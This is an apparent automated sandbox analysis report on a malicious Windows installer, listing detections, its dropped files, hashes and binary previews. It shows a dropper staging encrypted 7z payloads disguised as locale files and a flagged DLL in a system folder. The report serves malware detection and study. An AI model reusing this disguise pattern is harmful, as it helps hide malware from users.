        Classification:mal88.evad.winEXE@125/33@0/0
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 77%
        • Number of executed functions: 28
        • Number of non-executed functions: 77
        Cookbook Comments:
        • Found application associated with file extension: .exe

        Warnings

        • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe
        • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size exceeded maximum capacity and may have missing disassembly code.
        • Report size getting too big, too many NtCreateKey calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • VT rate limit hit for: #U5b89#U88c5#U52a9#U624b2.0.7.exe

        Simulations

        Behavior and APIs

        TimeTypeDescription
        07:03:08API Interceptor1x Sleep call for process: #U5b89#U88c5#U52a9#U624b2.0.7.tmp modified
        07:03:11API Interceptor23x Sleep call for process: powershell.exe modified

        Joe Sandbox View / Context

        IPs

        No context

        Domains

        No context

        ASNs

        No context

        JA3 Fingerprints

        No context

        Dropped Files

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        C:\Program Files (x86)\Windows NT\7zr.exe#U5b89#U88c5#U52a9#U624b2.0.4.exeGet hashmaliciousUnknownBrowse
          #U5b89#U88c5#U52a9#U624b2.0.5.exeGet hashmaliciousUnknownBrowse
            #U5b89#U88c5#U52a9#U624b2.0.2.exeGet hashmaliciousUnknownBrowse
              #U5b89#U88c5#U52a9#U624b2.0.3.exeGet hashmaliciousUnknownBrowse
                #U5b89#U88c5#U52a9#U624b2.0.1.exeGet hashmaliciousUnknownBrowse
                  cVyexkZjrG.exeGet hashmaliciousUnknownBrowse
                    cVyexkZjrG.exeGet hashmaliciousUnknownBrowse
                      #U5b89#U88c5#U52a9#U624b1.0.3.exeGet hashmaliciousUnknownBrowse
                        #U5b89#U88c5#U52a9#U624b1.0.1.exeGet hashmaliciousUnknownBrowse
                          #U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousUnknownBrowse

                            Created / dropped Files

                            C:\Program Files (x86)\Windows NT\7zr.exe

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):831200
                            Entropy (8bit):6.671005303304742
                            Encrypted:false
                            SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                            MD5:84DC4B92D860E8AEA55D12B1E87EA108
                            SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                            SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                            SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Joe Sandbox View:
                            • Filename: #U5b89#U88c5#U52a9#U624b2.0.4.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b2.0.5.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b2.0.2.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b2.0.3.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b2.0.1.exe, Detection: malicious, Browse
                            • Filename: cVyexkZjrG.exe, Detection: malicious, Browse
                            • Filename: cVyexkZjrG.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b1.0.3.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b1.0.1.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................

                            C:\Program Files (x86)\Windows NT\file.bin (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):2631665
                            Entropy (8bit):7.999930027122203
                            Encrypted:true
                            SSDEEP:49152:RckL5jn8TsLA33HdXwSluhXMQKjGmKkxT+jK7VFLcdg/0asbhZ9:R9L5bisLU3HdXbluW2k16mFkpdn
                            MD5:54CD10D2DC5A0C14D6D597D57D6EBDBE
                            SHA1:642DA4A9958EADCBC7FC3B338EFD933CA7982C89
                            SHA-256:3A1F4EA0988B53F28F47CD4827EA9A8D9B12F722BAA9307276C0A6AE4F7649C8
                            SHA-512:9FE76DA4769F27C9B123C9AF9805B15BA4B56ABDEE1B12BA423E4F5D5345A4ECB51F86C6D139FB78B4100A0A00C289A7D1F4D973DEB6E4A2D13FA1640707AD3F
                            Malicious:false
                            Preview:.@S....>.Gl......................X3.!4.....J.o#aB...ld.pd.. ....obU)...>i.A..j..v..'^.!H...g?.=.U.|S..H......hk$.&.......S..3.;.Z.L|.....]1.........mm,.~.iU..B.e..I....V.N..F..O....j@I.U..f.....h.-).$.<...Ez?.l.../4..DM..tt.....K..l..B...ic\...{.]...TXh^.......Q..$.h....6U..2N=......S-..hk.:.....x...!..C.......z..c...e..2s..c.@..?tK|..f.J/.p[:e.....U......&.....$....W./t.=.....W.1.ap{.L.8...k...Y..+.On..!...m.a.9.S...mB..)...a.$h'.e.......Q.y..[W.}.=............/E....8.....AR....u....j.O.a(..kk^5o.h1.m..M[....b.4...p...h..~...h.....]RIl.p....+UGhu3..%[E.._....$$a...@EQ./.P...,.C.G.fY|...9...~O...v.2gi.h.......'..x.z.....(....[<.MGeC..#.=.}....vnK..B.. E...a,.j"9U5...;..Z..p..u.WH..8.^..`.@..H... ......y.@.x.u.d.c.z;....'.B..GZ....v...S.[tC{......p...4t.6........xC..B..c.R6....(5s....n.V..(.'!]..{-s .]. .....U......G..4..'.,.........${.e..@.pA,..........%+.DMO'$.....\..0.......ju.#..V...i.FC=X.'-...x..N..A....+".+..a...C_...dF.6..r$..

                            C:\Program Files (x86)\Windows NT\hrsw.vbc

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3606016
                            Entropy (8bit):7.0063494494702985
                            Encrypted:false
                            SSDEEP:49152:/MifTj964EMRY42Kgq7eJEJqx2dhZe71MzuiehWIKxZfAtbyBSfbZmSKiyQF:/M+jcZ42KXw2dhZe71MzSRFyBSDH
                            MD5:95ACD5631A9131DB1FD066565AFC9A67
                            SHA1:8E9473BD632FF0F57FC34EECAC17174341D80D94
                            SHA-256:EA6B71519CD54AB523B822F84D5D4E5B305214DA4C37E96A02D8BC1CB182F58B
                            SHA-512:70188E7AD6B0D9DA5E88EEFC6095F99066F73FDAB10F084E3F2F96B30D8A717BAE75E9C1B476FB996BC86B9A753AAF26F96024D0068090B437EACE6E5BE35681
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 24%
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Fig...........!.....h....................................................7...........@.........................XC.......J..<....07.X....................@7..?...................................................K...............................text....f.......h.................. ..`.rdata..T............l..............@..@.data................b..............@....00cfg.......`(......"(.............@..@.tls.........p(......$(.............@....voltbl.F.....(......&(..................#.q....P.....(......((............. ..`.rsrc...X....07.......6.............@..@.reloc...?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................

                            C:\Program Files (x86)\Windows NT\is-73R9K.tmp

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):2381502
                            Entropy (8bit):7.999925361527667
                            Encrypted:true
                            SSDEEP:49152:jy256EiA8xG5zSjVi8PdH5lP0fc2k5UASQ/oFY/vyJHDNruHBsOvW:jyIrB8xG58fH5lP0l6XUNrWC
                            MD5:688183445140DA0F13690A143C57A42F
                            SHA1:01DF7279FA87C87733E93BF7B3DA05CF2ECF6490
                            SHA-256:8F0464EC2A7320ED2B11972E642AA490423857277E2BEB87B8C4DBDDA467894A
                            SHA-512:2C01BC07A0FED5FA6516DFDE36B2574620D1DC03D20B5814B467E38519EAC0EE82D403A94BD6D2966ED8713E9ABE26A1A00925805B1793ECD23621BA85045FD7
                            Malicious:false
                            Preview:..8-....,....A...TU.>.t.....~.N.Y4,..cZX"O]Z..n.G.;..3.,.WIz..<H....,.H,.w./.%"&z...z...;.&...<Jp..............z@....)...+..........-.|..c.._?S.mYY..j.|O..u..).........oR.%...3ZZX.%....}....2o.U..-.(D(w..f..f........AA....og....y...I..=..8.7..ld&dG.xC_.......f...$.....I..^..t..#=.k.L.....8...q&.....!X......a.XA.q.b|m.5.Gh0...J..R....../&*d....-.o..v.Z...;t!..Tb%.?.u.t.-.G....j.m.].m...=u.....o ..B.....e.^VO]j...%..[..`._...M.<.lq..%.-...BQ.C..oK:r4...dO...N...{O..E87M.a..Hwoxaw.J.T).s.C......w..P...9.qj.=cr..{.R...:Uf#,....M..h?.[.k...........K./.!....E(..G_.$.....1.1.T.......7......a........E.b...q...F.0...i.w.../..%/.&.9.?;...6X.!>...{.}]...K..]..2w..G;....XP!..ddwH....|......8.......O..J.-N....=.......g1p........z.w.3.P...........f......(uY..]......34._.5.'3.g.6p.E.4..`Z..EZ...p..b.&.........g...K.#Vd....\..,...D."+.M..#.#...&.|.[...7...#...$..o.*.U.@uF.u.c...u....'..52..u.Ni.>.jl.W..e.......^......` ..<..'.cRf.z$..H../&.Qb3z.1.

                            C:\Program Files (x86)\Windows NT\is-F0JVG.tmp

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):2631665
                            Entropy (8bit):7.999930027122203
                            Encrypted:true
                            SSDEEP:49152:RckL5jn8TsLA33HdXwSluhXMQKjGmKkxT+jK7VFLcdg/0asbhZ9:R9L5bisLU3HdXbluW2k16mFkpdn
                            MD5:54CD10D2DC5A0C14D6D597D57D6EBDBE
                            SHA1:642DA4A9958EADCBC7FC3B338EFD933CA7982C89
                            SHA-256:3A1F4EA0988B53F28F47CD4827EA9A8D9B12F722BAA9307276C0A6AE4F7649C8
                            SHA-512:9FE76DA4769F27C9B123C9AF9805B15BA4B56ABDEE1B12BA423E4F5D5345A4ECB51F86C6D139FB78B4100A0A00C289A7D1F4D973DEB6E4A2D13FA1640707AD3F
                            Malicious:false
                            Preview:.@S....>.Gl......................X3.!4.....J.o#aB...ld.pd.. ....obU)...>i.A..j..v..'^.!H...g?.=.U.|S..H......hk$.&.......S..3.;.Z.L|.....]1.........mm,.~.iU..B.e..I....V.N..F..O....j@I.U..f.....h.-).$.<...Ez?.l.../4..DM..tt.....K..l..B...ic\...{.]...TXh^.......Q..$.h....6U..2N=......S-..hk.:.....x...!..C.......z..c...e..2s..c.@..?tK|..f.J/.p[:e.....U......&.....$....W./t.=.....W.1.ap{.L.8...k...Y..+.On..!...m.a.9.S...mB..)...a.$h'.e.......Q.y..[W.}.=............/E....8.....AR....u....j.O.a(..kk^5o.h1.m..M[....b.4...p...h..~...h.....]RIl.p....+UGhu3..%[E.._....$$a...@EQ./.P...,.C.G.fY|...9...~O...v.2gi.h.......'..x.z.....(....[<.MGeC..#.=.}....vnK..B.. E...a,.j"9U5...;..Z..p..u.WH..8.^..`.@..H... ......y.@.x.u.d.c.z;....'.B..GZ....v...S.[tC{......p...4t.6........xC..B..c.R6....(5s....n.V..(.'!]..{-s .]. .....U......G..4..'.,.........${.e..@.pA,..........%+.DMO'$.....\..0.......ju.#..V...i.FC=X.'-...x..N..A....+".+..a...C_...dF.6..r$..

                            C:\Program Files (x86)\Windows NT\locale.bin

                            Download File
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):56546
                            Entropy (8bit):7.996932542816659
                            Encrypted:true
                            SSDEEP:1536:pgyiqyZS4P3hjTwJQkzCOiHyz11vMAotM:pgy2Se3hjTkzCoz11UAD
                            MD5:A0116399A576270821667DC52ED268A1
                            SHA1:F1D8E6AD0F646F28DAFC11CFC675F6DEB7879A87
                            SHA-256:74031DBC394941069E35F10B0E11CC231BBBCE4E8A2C5ACC7D7DC222DE2AA4CC
                            SHA-512:C5BB615D7E236C0A89543087BB944DFFBA15D7CDB982FC64E66165720CCA55D470B4FFE9ECED64E52D66A7FECD0965619D7DBBD53D33D488467319847391496E
                            Malicious:false
                            Preview:.@S....k.;.l ...............dN.....6M.S/...tZN...F.0..$......|..0.\..2b..j.0NM[p....l.a..2...g.m...[.Kv.M},..AN4.".....\...x..MR....G.j..R5c}v7@..eR...G.iW...-...S...1..-......c..L..2j.d.%E9.......X).M4}~...J..DL...Q0...k.....-.w..8..h..`.[.J.>..\jA.\..:.G;.v.N*...h..;P.m.h B\...`ILk..Y.U...0...@.b...A...$L...@..p.-...F.e....l.m..b.D....s?...NK..w..\S..~c{...............eq...a.x.. ..3X.Z4V.A...F.~.f.&..[.........y.lV.]Z....@.y._..m..4!.^..(.(../9.....@i....n..<Z~6....s..m@...s0X.F|.`...`.....#.9&..XY.....u.P^a.m...z.tEU..b......=!.._A..l.$.6..|jUXu*.r#b....~.g...,../f|...wv.Vz.x"..f.Q.W.........3.J.=)....q.5.k..f[...).S...V..=..N.R..6+b..v.Ox..?I...*B......75R..*.D.m.5O...Zu.=_@....r.?.{...Z.# .....S..G.9k.].C.!...j..{..?.2.3...q.....ZL..H..A.&R.XXE....oQ..g...)b.&.I.\.....|.......6..&.w$sai..=.pi....P.....v..(..<...S.\.S.L6.......<!6......(.4..i.....6.;..z.K1Q......=wy.Q.!1..4}..-.i8.....@.S.X......H.n.0 .V.Z/.#.q...s.4..dh,....0v4p..S.

                            C:\Program Files (x86)\Windows NT\locale.dat

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):56546
                            Entropy (8bit):7.9969325428166576
                            Encrypted:true
                            SSDEEP:1536:F9gH2nMO3Vhm1+kHCChICGLEoDFUHypSjtz8UQfH:8WnMKVhS+OkDFmycJz8RH
                            MD5:66B4020758023C8D7B0A20F8280ECE96
                            SHA1:4B4F9898B71061E7C4228E28756F3F83AB8A41AB
                            SHA-256:031EDECE090542D31C84BC15D2408347D794F06581C102E1A42F014E71FA5027
                            SHA-512:EE1EFF4030B9B96DAA077D49058169456F11B4A672BE3CF96B0E6670C9E68BA50439914B74CA976999F34F93B471BF2A7A69AA25303483C82E176038B17FF44E
                            Malicious:false
                            Preview:7z..'..............2..........c6ZZH(E....}b....n9*.......`mT....".+..5.6.......EV...G....)...rP..M..j......p-......}f*...'#..:........B.r..........RN..u...$...c..s....:....[4.d.]7.qg..d..*Y.E5..Ws......0\........0..PyD.i|.Ar..K.1q..Cu."]c.c.9.a.~.....uf.xn.{..X....Q.AY..L...x....Y......R.(^..)id..F7.*.VTg.....%...7..I...B.f...2>.......R("f%....8..u...4h...+....;.5.B.h.W.4p.G_..[T.A.w..^6..c.N.y..Z.A..N....i...t..kWJ..R&.6..Y..,ntTd..s.N.......C.&s7..."!.._.P.t.....9..Wk....OTo......AN......9.B.m.0.=H%....:O...Do:.....)..c/.E...Z:.G.;..'..i.....,....1.........,3>....b...feQ..D}...u....n..f.....Q.j.....1.X..)>W...T.A.ni...X...T..<j../..(....>..W.)..A..^%....m..S...g..T.f..N.X......k.R[.;~.O.x.2....f.....e..*.8....Z.I<w.....s.s.0..FH.UG..|..{R./.._.a.....7.+do.k.l......B@hY`.7...%.G.;..E........3Flv-M.6.,.).Ly.t.XY.{i$.....L....gc^i..... k.sG..%..1.Cw....+..G.@..1.IK.p....C..]l.^G.n.._EHl.... .W.0:.^...I..G....K....<.l.|....V.I^..sD.3

                            C:\Program Files (x86)\Windows NT\locale2.bin

                            Download File
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):56546
                            Entropy (8bit):7.996966859255975
                            Encrypted:true
                            SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                            MD5:CEA69F993E1CE0FB945A98BF37A66546
                            SHA1:7114365265F041DA904574D1F5876544506F89BA
                            SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                            SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                            Malicious:false
                            Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..

                            C:\Program Files (x86)\Windows NT\locale2.dat

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):56546
                            Entropy (8bit):7.996966859255979
                            Encrypted:true
                            SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                            MD5:4CB8B7E557C80FC7B014133AB834A042
                            SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                            SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                            SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                            Malicious:false
                            Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.

                            C:\Program Files (x86)\Windows NT\locale3.bin

                            Download File
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):31890
                            Entropy (8bit):7.99402458740637
                            Encrypted:true
                            SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                            MD5:8622FC7228777F64A47BD6C61478ADD9
                            SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                            SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                            SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                            Malicious:false
                            Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..

                            C:\Program Files (x86)\Windows NT\locale3.dat

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):31890
                            Entropy (8bit):7.99402458740637
                            Encrypted:true
                            SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                            MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                            SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                            SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                            SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                            Malicious:false
                            Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.

                            C:\Program Files (x86)\Windows NT\locale4.bin

                            Download File
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):74960
                            Entropy (8bit):7.99759370165655
                            Encrypted:true
                            SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                            MD5:950338D50B95A25F494EE74E97B7B7A9
                            SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                            SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                            SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                            Malicious:false
                            Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...

                            C:\Program Files (x86)\Windows NT\locale4.dat

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):74960
                            Entropy (8bit):7.997593701656546
                            Encrypted:true
                            SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                            MD5:059BA7C31F3E227356CA5F29E4AA2508
                            SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                            SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                            SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                            Malicious:false
                            Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.

